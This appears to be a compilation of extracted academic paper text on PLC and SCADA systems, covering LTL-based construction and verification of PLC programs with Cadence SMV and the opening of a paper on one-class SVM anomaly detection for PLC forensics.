[2] P. M. Esfahani, M. Vrakopoulous, K. Margellos, J. Lygeros, and G. Andersson, "Cyber attack in a two-area power system: Impact identification using reachability," in Proc. American Control Conf., Baltimore, USA, June 2010, pp. 962-967.
[3] D. Kundur, X. Feng, S. Liu, T. Zourntos, and K. Butler-Purry, "Towards a framework for cyber attack impact analysis of the electric smart grid," in Proc. of IEEE SmartGridComm, Gaithersburg, MD, Oct. 2010.
[4] K. Tomsovic, D. Bakken, V. Venkatasubramanian, and A. Bose, "Designing the next generation of real-time control, communication, and computations for large power systems," Proc. IEEE, vol. 93, no. 5, May 2005.
[5] C.-W. Ten, C.-C. Liu, and G. Manimaran, "Vulnerability assessment of cybersecurity for SCADA systems," IEEE Trans. Power Systems, vol. 23, no. 4, pp. 1836-1846, 2008.
[6] C.-W. Ten, C.-C. Liu, and M. Govindarasu, "Vulnerability assessment of cybersecurity for SCADA systems using attack trees," in IEEE PES General Meeting, USA, 2007, pp. 1-8.
[7] A. Creery and E. J. Byres, "Industrial cybersecurity for power system and SCADA networks," in Proc. Ind. Appl. Soc. 52nd Petroleum Chem. Ind. Conf., Sep. 12-14, 2005, pp. 303-309.
[8] D. Watts, "Security and vulnerability in electric power systems," in Proc. 35th North American Power Symposium, Rolla, Missouri, October 2003, pp. 559-566.
[9] A. A. Cardenas, S. Amin, Z.-Y. Lin, Y.-L. Huang, and S. Sastry, "Attacks against process control systems: risk assessment, detection, and response," in Proc. of the 6th ACM Symp. on Information, Computer & Communications Security, Mar.
2011, pp. 355-366.
[10] G. A. Francia III, D. Thornton, and J. Dawson, "Security best practices and risk assessment of SCADA and industrial control systems," http://elrond.informatik.tufreiberg.de/papers/WorldComp2012/SAM9789.pdf
[11] I. N. Fovino, A. Carcano, M. Masera, and A. Trombetta, "An experimental investigation of malware attacks on SCADA systems," Int. J. Critical Infrastructure Protection, vol. 2, no. 4, pp. 139-145, Dec. 2009.
[12] E. Byres, D. Leversage, and N. Kube, "Security incidents and trends in SCADA and process industries," The Industrial Ethernet Book, 39(2), pp. 12-20, 2007.
[13] R. Tsang, "Cyberthreats, vulnerabilities and attacks on SCADA networks," University of California, Berkeley, Working Paper, http://gspp.berkeley.edu/iths/Tsang_SCADA%20Attacks.pdf, 2010.
[14] V. M. Igure, S. A. Laughter, and R. D. Williams, "Security issues in SCADA networks," Computers & Security, vol. 25, no. 7, pp. 1-9, 2006.
[15] P. Ralston, J. Graham, and J. Hieb, "Cyber security risk assessment for SCADA and DCS networks," ISA Transactions, vol. 46, no. 4, pp. 583-594, 2007.
[16] R. Billinton and R. N. Allan, Reliability Evaluation of Power Systems. New York: Plenum, 1996.
Construction_and_verification_of_PLC_programs_by_LTL_specification.pdf
The article proposes an approach to construction and verification of PLC ST-programs for discrete problems. The linear-time temporal logic LTL is used for the specification of the program behavior. Programming is carried out in the ST (Structured Text) language, according to the LTL-specification. The correctness analysis of the LTL-specification is performed by Cadence SMV, a symbolic model checking tool. A new approach to programming and verification of PLC ST-programs is illustrated. For each discrete problem, we propose creating an ST-program, its LTL-specification, and an SMV-model.
Construction and Verification of PLC Programs by LTL Specification
E.V. Kuzmin, Yaroslavl State University, Yaroslavl, Russia, Email: [email protected]
A.A. Shipov, Yaroslavl State University, Yaroslavl, Russia, Email: [email protected]
D.A. Ryabukhin, Yaroslavl State University, Yaroslavl, Russia, Email: [email protected]

I. INTRODUCTION

Using programmable logic controllers (PLC) in systems managing complex industrial processes imposes strict correctness requirements upon the PLC programs. Any software error in a PLC program is considered inadmissible. However, the existing PLC program development tools, for instance the widely known CoDeSys (Controller Development System) package [7], merely provide the ordinary possibilities of program debugging through testing (not guaranteeing total absence of errors) by means of visualizing the PLC controllable objects.

At the same time, certain theoretical knowledge, along with experience of using existing designs, has been accumulated in the field of formal modeling methods and software system analysis. The programming of logic controllers is an applied field in which these existing designs can be applied successfully. Successful application is understood as the introduction of formal methods into the program development process as a proven technology which is clear to all specialists involved in this process: engineers, programmers and testers. PLC programs are normally small, have a finite state space, and are exceptionally convenient objects for formal (including automatic) correctness analysis.

Programmable Logic Controllers (PLCs) are a specific type of computer used widely in modern industry (in automation systems) [9], [4]. A PLC is a reprogrammable computer based on sensors and actors, which is controlled by a user program. PLCs are highly configurable and thus are applied in various industrial sectors. PLCs are a classic example of reactive systems. A PLC periodically repeats the execution of the user program. There are three major phases of program execution (the working cycle): 1) reading from inputs (sensors); 2) program execution; 3) writing to outputs (actors).

Programming languages for logic controllers are defined by the IEC 61131-3 standard. This standard includes the description of five programming languages: SFC, IL, ST, LD and FBD. These languages provide a possibility of applying all existing methods of program correctness analysis (testing, theorem proving [8] and model checking [6]) for the verification of PLC programs. Theorem proving is more applicable to continuous stability and regulation tasks of engineering control theory, since the implementation of these tasks on a PLC is associated with programming a relevant system of formulas. The model checking method is most suitable for discrete tasks of logic control requiring a PLC with binary inputs and outputs. This provides a finite space of possible states of the PLC program. The most convenient languages for programming, specification and verification of PLC programs are ST, LD and SFC, as they do not present difficulties for either developers or engineers and can be easily translated into the languages of software tools for automatic verification.

Earlier, in [2], a review of methods and approaches to programming discrete PLC problems was provided based on the example of the problem of modeling a code lock control program. The usability of the model checking method for program correctness analysis with respect to the Cadence SMV automatic verification tool [12] was evaluated.
Some possible PLC program vulnerabilities that surface when traditional approaches to programming are used were also revealed.

This article proposes an approach to modeling and verification of discrete PLC programs. To specify program behavior, we use the linear-time temporal logic LTL. The programming is carried out in the ST language according to the LTL specification. The LTL specification correctness analysis is carried out by the Cadence SMV symbolic model checking tool. We demonstrate a new approach to programming and verification of PLC programs. A discrete problem is provided with an ST program, its LTL specification, and an SMV model.

The purpose of the article is to describe an approach to programming PLCs which would provide a possibility of PLC program correctness analysis by applying the model checking method. Further work includes building software tools for modeling, specification, construction and verification of PLC programs.

II. MODEL CHECKING. A PLC PROGRAM MODEL

Model checking is the process of verifying whether a given model (a Kripke structure) satisfies a given logical formula. A Kripke structure represents the behavior of a program. A temporal logic formula encodes a property of the program. The linear-time temporal logic (LTL) is used.

A Kripke structure on a set of atomic propositions P is a state transition system S = (S, s0, →, L), with a non-empty set of states S, an initial state s0 ∈ S, a transition relation → ⊆ S × S, which is defined for all s ∈ S, and a function L: S → 2^P, labeling every state with a subset of atomic propositions. A path of the Kripke structure from the state s0 is an infinite sequence of states π = s0 s1 s2 ... such that si → si+1 for all i ≥ 0.

The linear-time temporal logic language is considered as a specification language for the behavioral properties of a program model. A PLC is a classic reactive control system which, once running, must always have a correct infinite behavior. LTL formulas allow representing this behavior. The syntax of LTL formulas is given by the following grammar, where pi ∈ P:

φ, ψ ::= true | p0 | p1 | ... | pn | ¬φ | φ ∨ ψ | Xφ | φ U ψ | Fφ | Gφ

An LTL formula describes a property of one path of the Kripke structure, starting from some emphasized current state. The temporal operators X, F, G and U are interpreted as follows: Xφ means that φ must hold in the next state; Fφ means that φ must hold in some future state of the path; Gφ means that φ must hold in the current state and all future states of the path; φ U ψ means that ψ must hold in the current or a future state, and φ must hold until this point. In addition, the classic logical operators ∧ and → will be used further on.

A Kripke structure satisfies an LTL formula (property) φ if φ holds true for all paths starting from the initial state s0.

A Kripke model for a PLC program can be built quite naturally. For a state of the model we take a vector of values of all program variables, which can be divided into two parts. The first part is a value vector of the inputs at the starting moment of a new PLC working cycle. The second part is a value vector of the outputs and internal variables after a complete working cycle (on the inputs from the first part).
In other words, the state of the model is the state of the PLC program after a complete working cycle. Thus, a transition from one state to another depends on the (previous) values of the outputs and internal variables of the first state and the (new) values of the inputs of the second state. For each state, the degree of branching of the transition relation is determined by the number of all possible combinations of the PLC's input signals. Atomic propositions of the model are logical expressions on the PLC program variables with the use of arithmetic and relational operators.

III. PROGRAMMING CONCEPT

The purpose of the article is to describe an approach to programming PLCs which would provide a possibility of PLC program correctness analysis by means of the model checking method. We will proceed from convenience and simplicity of using the model checking method. It is necessary that the two following conditions hold true.

Condition 1. The value of each variable must not change more than once per one full run of the program during the PLC working cycle.

Condition 2. The value of each variable must only change in one place of the program, in some operation block without nestings.

It is obvious that one run of the working cycle either increases, decreases or does not change the value of any variable. We will change the variable value only when it is really necessary, i.e. we will forbid assignment access to the variable if the conditions for a mandatory change of its value are not fulfilled. In this approach, the requirements for changing the value of a certain variable V after one run of the PLC working cycle are represented by the following LTL temporal logic formulas.

The following LTL formula is used for describing the situations leading to an increase of the value of the variable V:

GX(V > _V → OldValCond ∧ FiringCond ∧ V = NewValExpr)    (1)

This formula means that whenever a new value of the variable V is larger than its previous value, recorded in the _V variable, it follows that the old value of V satisfies the OldValCond condition, the condition of the external action FiringCond is fulfilled, and the new value of V is the value of the expression NewValExpr. The leading underscore symbol _ in the _V variable is taken as a pseudo-operator. It allows referring to the previous-state value of the variable V. The pseudo-operator can be used only under the scope of the X temporal operator. The FiringCond and OldValCond conditions are logical expressions over program variables and constants, which are constructed using comparison operators, logical and arithmetic operators and the _ pseudo-operator. By definition, the pseudo-operator can be applied only to variables. The FiringCond expression describes the situations where changing the value of V is needed (if it is allowed by the OldValCond condition). The NewValExpr expression is built using variables and constants, comparison, logical and arithmetic operators and the _ pseudo-operator. For a description of all possible situations increasing the value, this formula may have several conjunctive parts OldValCond_i ∧ FiringCond_i ∧ V = NewValExpr_i, combined in a disjunction after the → operator.

Situations that lead to a decrease of the value of V are described similarly:

GX(V < _V → OldValCond' ∧ FiringCond' ∧ V = NewValExpr')    (1')

Temporal formulas of the (1) and (1') type describe the desired behavior of some integer variable.
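As a hypothetical illustration (not taken from the article), consider an integer variable Count that is incremented on the rising edge of a sensor input S while it is below a limit of 10, and that is reset to zero by a button R. Following templates (1) and (1'), its behavior would be specified as:

    GX(Count > _Count → _Count < 10 ∧ (¬_S ∧ S) ∧ Count = _Count + 1)
    GX(Count < _Count → _Count > 0 ∧ R ∧ Count = 0)

Here the rising edge ¬_S ∧ S and the button R play the role of FiringCond, the bounds _Count < 10 and _Count > 0 play the role of OldValCond, and NewValExpr is _Count + 1 and 0, respectively.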
A simpler LTL formula is proposed in the case of a variable of a logical (binary) data type. The following formula describes the situations where the value of a binary V variable increases:

GX(¬_V ∧ V ⇒ FiringCond)   (2)

Situations that lead to a decrease of the V variable value are described similarly:

GX(_V ∧ ¬V ⇒ FiringCond')   (2')

Let us look at the special case of specifying the (1) and (1') type where for V we have FiringCond = FiringCond' = true, NewValExpr = NewValExpr', OldValCond = (_V < NewValExpr) and OldValCond' = (_V > NewValExpr):

GX(V > _V ⇒ _V < NewValExpr ∧ V = NewValExpr);
GX(V < _V ⇒ _V > NewValExpr ∧ V = NewValExpr).

Such a specification can be replaced by the following LTL formula:

GX(V = NewValExpr)   (3)

The V variable, for which specifications of the (1) and (1') type or of the (2) and (2') type are built, will be called a register variable. If a specification of the (3) type is built, V is called a function variable. In the special case of specification (3) where the NewValExpr expression does not contain the _ leading underscore pseudo-operator, the V variable is called a substitution variable. It is important to note that each of the LTL formula templates is constructive, i.e., by following the specification one can easily build a program that conforms to the temporal properties expressed by these formulas. Thus, we can say that PLC programming comes down to building a behavior specification of each program variable, whether it is an output or an auxiliary internal variable. The process (stage) of writing program code is completed when a specification for each such variable is created. Note that the quantity and meaning of output variables are defined by the PLC and the problem statement. Such an approach to PLC programming somewhat solves the specification completeness problem. In this case, the program specification is divided into two parts: 1) specification of the behavior of all program variables (except inputs), 2) specification of common program properties. The second part of the specification affects the quantity and the meaning of internal auxiliary PLC program variables. While building a specification, it is important to take into consideration the order of temporal formulas describing the behavior of the variables. A certain variable without the _ pseudo-operator may be involved in the specification of another variable's behavior only if the specification of its own behavior is already completed and appears in the text above. If necessary, we will use the Init keyword to indicate the variable's initial value. For example, Init(V) = 1 means that the V variable is initially set to 1. If the initial value of some variable is not defined explicitly, it is assumed that this value is zero.

IV. PROGRAMMING BY SPECIFICATION

In this section we explore a way of building program ST-code according to the constructive LTL specification of the program variable behavior. In general, the translation scheme of LTL formulas into ST-code is the following. The two temporal formulas of the V variable, marked V+ (value increase, (1)) and V- (value decrease, (1')), are set in conformity to the IF-ELSIF text block in the ST language:

IF OldValCond AND FiringCond THEN
    V := NewValExpr;   (* V+ *)
ELSIF OldValCond' AND FiringCond' THEN
    V := NewValExpr';  (* V- *)
END_IF;
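The scan-cycle semantics behind this translation can be illustrated with a minimal Python sketch (a hypothetical example following templates (1) and (1'), not the paper's tooling): the variable changes at most once per cycle, only under its guard conditions, and its previous value is remembered at the end of the cycle for use as _V in the next one.

def scan_cycle(level, up, down):
    """One PLC working cycle for a register variable 'level' in the range 0..10
    (hypothetical example; 'up' and 'down' play the role of the firing conditions)."""
    if level < 10 and up:        # OldValCond AND FiringCond   -> V+
        level = level + 1        # NewValExpr
    elif level > 0 and down:     # OldValCond' AND FiringCond' -> V-
        level = level - 1        # NewValExpr'
    # otherwise the variable retains its previous value (Conditions 1 and 2)
    prev_level = level           # pseudo-operator section: _V := V at the end of the cycle
    return level, prev_level

# e.g. scan_cycle(5, up=True, down=False) returns (6, 6)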
If the number of conjunctive blocks OldValCond_i ∧ FiringCond_i ∧ V = NewValExpr_i in the LTL formulas is more than the two considered here, then the number of alternative ELSIF branches grows accordingly (by one branch per each new block). Similarly, a specification of the (2) and (2') type for a binary V variable corresponds to the block:

IF NOT _V AND FiringCond THEN
    V := 1;   (* V+ *)
ELSIF _V AND FiringCond' THEN
    V := 0;   (* V- *)
END_IF;

In the case of programming the behavior of a V function variable (3), we have a simple assignment:

V := NewValExpr;   (* V *)

Each program variable must be defined in the description section (local or global) and initialized in accordance with the specification. Note that, for example, in the CoDeSys development environment [7] all variables are initialized to zero by default. In addition, we must implement the notion of the _ leading underscore pseudo-operator. In order to do that, an area for a pseudo-operator section is allocated at the end of the program. In this area, a _V := V assignment is added after the description of the behavior of all specification variables. The assignment is added for each V variable whose previous value was addressed as _V. The _V variable also has to be defined in the description section with the same initialization as the V variable. Note that the approach to programming by specification, which describes the reason for changing each program variable value, looks very natural and reasonable, because the PLC output signal is a control signal, and changing its value usually carries an additional meaning. For example, it is important to clearly understand why an engine should be turned on/off, or why some lamp must be switched on/off. Therefore, it seems quite obvious that every variable must be accompanied by two properties, one per each direction of change. It is assumed that if the conditions of the changes are not fulfilled, the variable retains its previous state.

V. BUILDING AN SMV MODEL BY SPECIFICATION

We consider the Cadence SMV [12] verifier as a software tool for correctness analysis by means of the model checking method. After a specification has been created, it is proposed that a Kripke structure model in the SMV language be built and that the common program properties be verified against this model. If some common program property is not true for the model, the verifier builds an example of an incorrect path in the Kripke structure model, by means of which corrections are introduced into the specification. The PLC ST program is built by the specification only after all the program properties have been verified and the verification has brought positive results. The means of the SMV language allow defining the variable value in the next state by using the next operator. The branching of the transition relation is provided by nondeterministic assignment. For example, the next(V) := {0, 1} assignment means that states and transitions to them will be generated both with the value V = 0 and with the value V = 1. In the SMV language, the &, |, ~ and -> symbols denote logical and, or, not, and implication, respectively. The SMV language is oriented on creating the next states of Kripke models from the current state. The initial current state of the model is the state of the program after initialization.
Therefore, the specification of the behavior of the V variable, (1) and (1'), will be easier (clearer) to handle if rewritten in the following equivalent form:

V+: G(X(V > _V) ⇒ X(OldValCond) ∧ X(FiringCond) ∧ X(V = NewValExpr)),
V-: G(X(V < _V) ⇒ X(OldValCond') ∧ X(FiringCond') ∧ X(V = NewValExpr')).

We then get an SMV model of the V variable behavior quite naturally by putting the next operator in conformity with the temporal X operator:

case {
    next(OldValCond) & next(FiringCond) : next(V) := next(NewValExpr);
    next(OldValCond') & next(FiringCond') : next(V) := next(NewValExpr');
    default : next(V) := V;
};

The default keyword stands for what must happen by default, i.e., if the conditions of the first two branches in the case block are not true. In the case of a boolean V variable, the specification (2) and (2') is converted to the following SMV model:

case {
    ~V & next(FiringCond) : next(V) := 1;
    V & next(FiringCond') : next(V) := 0;
    default : next(V) := V;
};

A model of a function-variable behavior is defined simply as

next(V) := next(NewValExpr);

Let us now consider the specification of the behavior of a V substitution variable. In this case NewValExpr does not contain the _ pseudo-operator. This allows us to rewrite the specification in the following equivalent form: V: XG(V = NewValExpr). In fact, this formula means that if the initial state of the model is not taken into account, then the V = NewValExpr equation must be true in all the other states of the model. The correctness of the XG(V = NewValExpr) formula follows from the correctness of a slightly more general formula: G(V = NewValExpr). Therefore, the more general formula can be used as the constructive specification for building an SMV model of the V substitution variable. An SMV model is built by this specification simply in the form of an assignment V := NewValExpr. The Cadence SMV verifier allows checking program models containing up to 59 binary variables (all variables are represented by sets of binary variables in SMV). The substitution variables are not included in this number, i.e., only register variables and function variables are considered.

VI. CONCLUSION

The approach has been successfully proven on some (about a dozen) discrete logical control problems of different types, with the average number of binary PLC inputs and outputs of about 30 and the total number of binary program variables of up to 59. For example, in order to exclude the possibility of bad product output in a plant, PLC program properties of conformance with the technological process of mix preparation and of uninterrupted work of a hydraulic system (timely engagement of backup pumps) were verified. Also, PLC program properties of mandatory command execution for engaging an elevator cabin in a public library were tested. The verification was carried out on a PC with an Intel Core i7 2600K 3.40 GHz processor. It took the Cadence SMV verifier a mere few seconds to check the properties. Based on the results of this research, further work includes building software tools for modeling, specification, construction, and verification of PLC programs.

REFERENCES
[1] Kuzmin E. V., Sokolov V. A. Modeling, Specification and Construction of PLC-programs // Modeling and Analysis of Information Systems. 2013. V. 20, No. 2. P. 104-120. [In Russian].
[2] Kuzmin E. V., Sokolov V. A. On Construction and Verification of PLC-programs // Modeling and Analysis of Information Systems. 2012. V. 19, No. 4. P. 25-36. [In Russian].
[3] Kuzmin E. V., Sokolov V. A. On Verification of PLC-programs Written in the LD-Language // Modeling and Analysis of Information Systems.
2012. V. 19, No. 2. P. 138-144. [In Russian].
[4] Petrov I. V. Programmiruemye kontrollery. Standartnye jazyki i priemy prikladnogo proektirovanija. M.: SOLON-Press, 2004. 256 p. [In Russian].
[5] Canet G., Couffin S., Lesage J.-J., Petit A., Schnoebelen Ph. Towards the Automatic Verification of PLC Programs Written in Instruction List // Proc. of the IEEE International Conference on Systems, Man and Cybernetics. Argos Press, 2000. P. 2449-2454.
[6] Clarke E. M., Grumberg O., Peled D. A. Model Checking. The MIT Press, 2001.
[7] CoDeSys. Controller Development System. http://www.3s-software.com/
[8] Gries D. The Science of Programming. Springer-Verlag, 1981.
[9] Parr E. A. Programmable Controllers. An Engineer's Guide. Newnes, 2003. 442 p.
[10] Pavlovic O., Pinger R., Kollman M. Automation of Formal Verification of PLC Programs Written in IL // Proceedings of the 4th International Verification Workshop (VERIFY'07). Bremen, Germany, 2007. P. 152-163.
[11] Rossi O., Schnoebelen Ph. Formal Modeling of Timed Function Blocks for the Automatic Verification of Ladder Diagram Programs // Proc. of the 4th International Conference on Automation of Mixed Processes: Hybrid Dynamic Systems. Shaker Verlag, 2000. P. 177-182.
[12] SMV. The Cadence SMV Model Checker. http://www.kenmcmil.com/smv.html

APPENDIX A (THE 31 LOGIC GAME)

Let us look at the 31 logic game, which is formulated as follows. There are two players, and the players take turns. There are 24 playing cards laid out on the table in six rows, faces down: 4 aces (4 units) are in the first row, 4 deuces in the second, 4 threes in the third, 4 fours in the fourth, 4 fives in the fifth, and 4 sixes in the sixth. A player turns over one card per turn. Only the cards that are face down can be turned over. A player loses if, after his move, the sum of the turned-over cards exceeds 31. The task is to construct a PLC program (with 7 binary inputs and 18 binary outputs) for controlling the 31 game. If the PLC is the second player, the PLC must win every time the first player starts the game by turning over a 3, 4 or 6 card. If the first player starts the game with a 1, 2 or 5 card, then the PLC must win if the first player does not resort to the complete take-out strategies of the 1, 2 or 5, respectively.

Fig. 1. Control panel for the 31 logic game

Fig. 1 shows a diagram of the game control panel. The buttons 1, 2, 3, 4, 5 and 6 are used for turning over the corresponding card. Pressing a button simultaneously with another button is treated as incorrect and is not taken into consideration; in that case, the button should be released and then pressed correctly. After a correct pressing of one of the buttons, the corresponding value on the card display decreases by one. The initial display value is 4 for each display. The display values are bounded below by zero. The sum of the turned-over cards is shown on the sum display after each turn of the Player and/or the PLC. The Start button allows restarting the game. The latest move is indicated by turning on one of the six lights located above the corresponding number. The corresponding Turn lights indicate whose turn it is: Player or PLC. The corresponding Win light indicates the winner: Player or PLC. The PLC interface is shown in Fig. 2.
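The state update behind this panel can be summarized in a short sketch (a hypothetical Python illustration of the rules above, not the paper's ST program): turning over a card of denomination k decrements the corresponding counter, adds k to the running sum, and hands the turn to the other side.

def press_card(state, k):
    """Turn over one card of denomination k (1..6), if any remain face down."""
    if state["V"][k] == 0:
        return state                              # no card of this value left: press ignored
    state["V"][k] -= 1                            # card display for k decreases by one
    state["Sum"] += k                             # sum display is updated after the turn
    if state["Sum"] > 31:
        state["loser"] = state["turn"]            # whoever exceeded 31 loses
    state["turn"] = "PLC" if state["turn"] == "Player" else "Player"
    return state

initial = {"V": {k: 4 for k in range(1, 7)}, "Sum": 0, "turn": "Player", "loser": None}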
Outputs running out to the sum display and card displays are not depicted on the interface in order to save space. Hereinafter, code responsible for displaying information will be omitted for the same reason.

Common program properties and auxiliary variables. Global variables of the PLC program are defined by the PLC interface. Auxiliary internal variables are usually needed to express common program properties taken from the problem statement and the necessity of implementing the algorithm. In this section, we explore some common program properties for the 31 logic game as an example. These properties are specified as LTL formulas with the use of auxiliary variables.

Fig. 2. PLC control interface of the 31 game

It is important to note that the description of some internal variables and timers follows directly from the problem statement. For example, we introduce the V1, V2, V3, V4, V5 and V6 variables to store the number of unturned cards of each denomination, and the Sum variable is used to store the sum of the values of all turned cards. Other internal variables may appear for programming ease and program readability. The explicit common program properties for a logic game are those properties which express the conformity between the program behavior and the winning strategies. The game strategy description assumes manipulation with the notion of a turn in general, meaning turning cards, as well as the notion of a concrete turn corresponding to turning a card of a specific denomination. For these purposes, we introduce the Mv1, Mv2, Mv3, Mv4, Mv5 and Mv6 variables. If the value of one of these variables is 1, it means that a turn consisting of turning over a card of denomination 1, 2, 3, 4, 5 or 6, respectively, was performed. If the value of Mv is 1, it means that a game turn was made on this run of the PLC working cycle. The PLC game strategy may vary depending on the resources, that is, the availability of unturned cards. We determine the impossibility for the PLC to make a turn according to the direct strategy with the Lck variable. We use the Rst variable to specify the necessity of resetting the game to the initial state. Incorrect pressing of buttons is detected with the Skp variable.

So, let us consider some examples of common program properties for the 31 logic game.

1. G(¬(PLCWin ∧ ManWin)) means that there are no situations in which the PLC and the Player are winners at the same time.

2. The value of the Sum variable always remains less than or equal to 37: G(Sum ≤ 37).

3. The formula G(Mv1 + Mv2 + Mv3 + Mv4 + Mv5 + Mv6 ≤ 1) forbids making more than one game turn during one run of the PLC working cycle.

4. Pressing the PBStart button should lead to resetting the game to the initial state: G(PBStart ⇒ V1 = 4 ∧ V2 = 4 ∧ V3 = 4 ∧ V4 = 4 ∧ V5 = 4 ∧ V6 = 4 ∧ ¬Mv ∧ ¬Turn ∧ ¬(PLCWin ∨ ManWin) ∧ Sum = 0).

5. If a game turn is performed infinitely often, then from any reachable state the program will sooner or later be in a "PLC wins" state, a "Player wins" state or the initial state: G(F(Mv)) ⇒ G(F(PLCWin ∨ ManWin ∨ PBStart)).

6. Let us consider only the behavior corresponding to a continuous normal game, i.e., when turns occur from time to time and the PBStart reset button is pressed only when the game has ended with a win of one of the players.
In this case each new game will always lead to a win of one of the players:

G(F(Mv)) ∧ G(¬PBStart ∧ X(PBStart) ⇒ (PLCWin ∨ ManWin)) ⇒ G(PBStart ∧ X(¬PBStart) ⇒ X(¬PBStart U (PLCWin ∨ ManWin))).

7. The following three properties correspond to the winning strategies of the PLC if the Player starts the game by turning over the 3, 4 or 6 card, respectively:

G(F(Mv)) ∧ G(¬PBStart ∧ X(PBStart) ⇒ (PLCWin ∨ ManWin)) ⇒ G(Mv3 ∧ Sum = 3 ⇒ ((¬ManWin ∧ ¬PLCWin) U PLCWin));
G(F(Mv)) ∧ G(¬PBStart ∧ X(PBStart) ⇒ (PLCWin ∨ ManWin)) ⇒ G(Mv4 ∧ Sum = 4 ⇒ ((¬ManWin ∧ ¬PLCWin) U PLCWin));
G(F(Mv)) ∧ G(¬PBStart ∧ X(PBStart) ⇒ (PLCWin ∨ ManWin)) ⇒ G(Mv6 ∧ Sum = 6 ⇒ ((¬ManWin ∧ ¬PLCWin) U PLCWin)).

8. The formula G(X(Mv1 ∧ Sum = 1 ∨ Mv2 ∧ Sum = 2 ∨ Mv3 ∧ Sum = 3 ∨ Mv4 ∧ Sum = 4 ∨ Mv5 ∧ Sum = 5 ∨ Mv6 ∧ Sum = 6) ⇒ ¬Turn) expresses the property that the first turn always belongs to the Player and not to the PLC.

The full LTL specification for the 31 logic game follows. In the next sections, the ST program and the SMV model are constructed by this LTL specification.

Specification for the 31 logic game
Detecting_anomalous_behavior_of_PLC_using_semi-supervised_machine_learning.pdf
Industrial Control Systems (ICS) are used to monitor and control critical infrastructures. Programmable logic controllers (PLCs) are major components of ICS and are used to build automation systems. It is important to protect PLCs from attacks and undesired incidents. However, it is not easy to apply traditional tools and techniques to PLCs for security protection and forensics because of their unique architectures. The semi-supervised machine learning algorithm One-class Support Vector Machine (OCSVM) has been applied successfully to many anomaly detection problems. This paper proposes a novel methodology to detect anomalous PLC events using OCSVM. The methodology was applied to a simulated traffic light control system to illustrate its effectiveness and accuracy. Our results show that anomalous PLC operations are identified with high accuracy, which can help investigators perform PLC forensics efficiently and effectively.
Detecting Anomalous Behavior of PLC using Semi- supervised Machine Learning Ken Yau, KP Chow, SM Yiu, CF Chan Department of Computer Science The University of Hong Kong Hong Kong, China {kkyau, chow, smyiu, cfchan}@cs.hku.hk Keywords Programming logic controller, forensics, machine learning I. INTRODUCTION Industrial Control System (ICS) system is used to monitor and control industrial and infrastructure processes such as chemical plant and oil refinery operations, electricity generation and distribution, and water management [1]. If any undesirable incidents happened to the systems, it may hazard human s lives, cause serious damage to our environment and enormous financial loss. It is important to protect the systems from any undesired incidents such as hardware failure, malicious intruders, accidents, natural disasters, accidental actions by insiders [5]. Traditionally, the control systems have been operated as isolated systems with no network connection to the world. Threats against these systems were limited to physical damage attacks or data tampering that originated inside the system. Nowadays, such systems are connected to the corporate networks and Internet over TCP/IP and wireless IP for improving performance and effectiveness [2]. As a result, the closed systems have been exposed to various Internet threats and attacks. Programmable Logic Controller (PLC) is an essential component of ICS. It is a special computer, which can be used to construct an automation system (from very simple one to a rather complicated one). An example of a simple automation system is Lighting Control System. The system is used to turn lights on automatically when the area becomes occupied and turn them off when the area becomes unoccupied. On the other hand, a group of PLCs can form a complex automation control system such as power generation system. PLCs in electricity generation system are responsible for automating numerous tasks that keep the electricity flowing to our home, offices and factories [3]. Because of the special architecture of PLC such as limited memory and proprietary operating system, it is difficult to apply contemporary tools and techniques for security protection and digital forensics. This paper proposes to adopt a semi-supervised machine learning algorithm, One-class Support Vector Machine (OCSVM), to detect PLC anomalous events. Although OCSVM has previously been applied successfully to anomaly detection problems such as detecting anomalous Windows registry accesses [25], it seems that it has not been used to detect PLC anomalous behavior. Compared to supervised machine learning, semi-supervised machine learning may be a better solution for PLC anomaly detection (see the followings for more elaboration). In our experiment, we selected a popular PLC, Siemens Simatic S7-1212C, and set up a common critical PLC application: simulated traffic light control system. Anomalous operations of traffic light control system were created in order to prove the effectiveness and accuracy of the methodology. The proposed methodology is an initial step for us to create a generic model to detect anomalous behavior of any PLC and other control programs even with limited domain knowledge of PLC applications. II. 
P ROGRAMMABLE LOGIC CONTROLLER Programmable Logic Controller (PLC) is a special form of microprocessor-based controller that uses a programmable memory to store instructions and to implement functions such as logic, sequencing, timing, counting and arithmetic in order to control machines and processes (Fig.1) [4]. When designing and implementing control applications, PLC programming is an important task. All PLCs have to be 978-1-5386-0683-4/17/$31.00 2017 IEEE2017 IEEE Conference on Communications and Network Security (CNS): The Network Forensics Workshop 978-1-5386-0683-4/17/$31.00 2017 IEEE 580 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:37 UTC from IEEE Xplore. Restrictions apply. Fig. 1. Programmable Logic Controller loaded with user program to control the status of outputs according to status of inputs. PLC can identify each input and output by address. For Siemens PLC, the inputs and outputs have their addresses in terms of the byte and bit numbers. For example, I0.7 is an input at bit 7 in byte 0 and Q0.7 is an output at bit 7 in byte 0. A PLC generates anomalous operations in the following situations [15]: (i) hardware failure; (ii) incompatible firmware version; (iii) control program bugs created by an authorized programmer or attacker; (iv) stop and start attacks; and (v) memory read and write attacks. In order to detect these kinds of anomalous operations, we do the followings. We first capture relevant values of memory addresses used by PLC control program in normal situation. The captured values are used to train a model for the normal behavior of PLC using the semi-supervised machine learning. The trained model can be used to classify whether the PLC events are in normal operation or not. To demonstrate our proposed methodology, we developed a control program by STEP 7 (Siemens programming software for S7 PLC programming, communication and configuration) for controlling traffic light control system (Fig. 2). A. Traffic Light Control System The setup of a simulated traffic light control system that we used in our experiment is shown in Fig 2. PLC Input I0.0 and I0.1 were connected with switches. PLC Output Q0.0, Q0.1, Q0.5, Q0.6, and Q0.7 were connected with lights. The traffic light control program (TLIGHT) was from the user guide SIEMENS SIMATIC S7-300 Programmable Controller Quick Start [6]. The control system is constructed by a set of instructions which are Inputs, Outputs, Memory Bit, and Timers. The instruction details are listed in Table I [6]. III. C HALLENGES OF PLC PROTECTION AND FORENSICS Traditional tools and techniques are not easy to apply directly to PLCs for security protection and forensic investigation because of its unique architectures, such as special operating systems and limited memory [9]. For example, there is no software can be installed to PLC to prevent and detect malicious software. Followings are PLC forensic challenges [8]: Lack of documentation: Insufficient low-level documentation available for PLC with serious implications for forensic investigations. Lack of domain specific knowledge and experience: There is no comprehensive knowledge for performing PLC forensics. Lack of security mechanisms: No logging systems for security and forensic purposes. Lack of forensic tools: No dedicated forensic tools for PLC to perform a comprehensive investigation. Availability / Always-On: The availability of PLC in ICS environment is always top priority. 
